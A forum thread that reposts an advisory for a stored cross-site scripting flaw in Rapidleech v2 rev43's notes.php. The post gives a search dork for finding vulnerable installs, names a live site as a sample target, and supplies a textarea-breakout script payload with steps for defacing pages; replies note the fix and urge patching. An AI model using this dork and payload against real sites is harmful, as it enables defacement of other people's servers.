Latest Announcemnent
New thread

Rapidleech v2 rev43 Exploit--Beware!

Status
Not open for further replies.
D

Devilz

Active Member
1,003
2009
55
0
Code: 
# Exploit Title: Deface By XSS In RapidLeech
# Google Dork: inurl:"index.php?debug=1" or intitle:"Rapidleech v2 rev. 43"
# Date: 2011/20/December
# Author: M.R.S.CO - Ashiyane.org
# Software Link: http://dl.p30vel.ir/RapidLeech-pre_release-for_v43-Rev_397.zip
# Version: v2 rev. 43
# Tested on: WINDOWS - LINUX
# E-Mail : Bl4ck.H4t@Att.Net
Powered By M.R.S.CO

sample Address : http://appvn.org/notes.php
go to this address : http://site.com/notes.php
Enter In TextBox </textarea><SCRIPT>alert(/M.R.S.CO XSS/)</SCRIPT> FOR TEST XSS AND SAVE

FOR DEFACE ENTER THIS CODE SAMPLE :
And save - This Time Defaced

Source :- Some Exploit/Hacking Site

**DEVILZ**
 
3 comments
Devilz said:
Code: 
# Exploit Title: Deface By XSS In RapidLeech
# Google Dork: inurl:"index.php?debug=1" or intitle:"Rapidleech v2 rev. 43"
# Date: 2011/20/December
# Author: M.R.S.CO - Ashiyane.org
# Software Link: http://dl.p30vel.ir/RapidLeech-pre_release-for_v43-Rev_397.zip
# Version: v2 rev. 43
# Tested on: WINDOWS - LINUX
# E-Mail : Bl4ck.H4t@Att.Net
Powered By M.R.S.CO

sample Address : http://appvn.org/notes.php
go to this address : http://site.com/notes.php
Enter In TextBox </textarea><SCRIPT>alert(/M.R.S.CO XSS/)</SCRIPT> FOR TEST XSS AND SAVE

FOR DEFACE ENTER THIS CODE SAMPLE :
And save - This Time Defaced

Source :- Some Exploit/Hacking Site

**DEVILZ**
Click to expand...
xss vulnerability only in note.php (n not used for some people including me), it has been fixed by Th3-822.

n note: that's including the previous version of rapidleech, not only rev 43.
 
@RVT , This is Post was only for the Information to the memebers :)
I know that this Exploit will do work for Other versions too [due to notes.php]

Members are Requested to Check Rapidleech Forums for the FIX/PATCH
 
Status
Not open for further replies.
Back
Top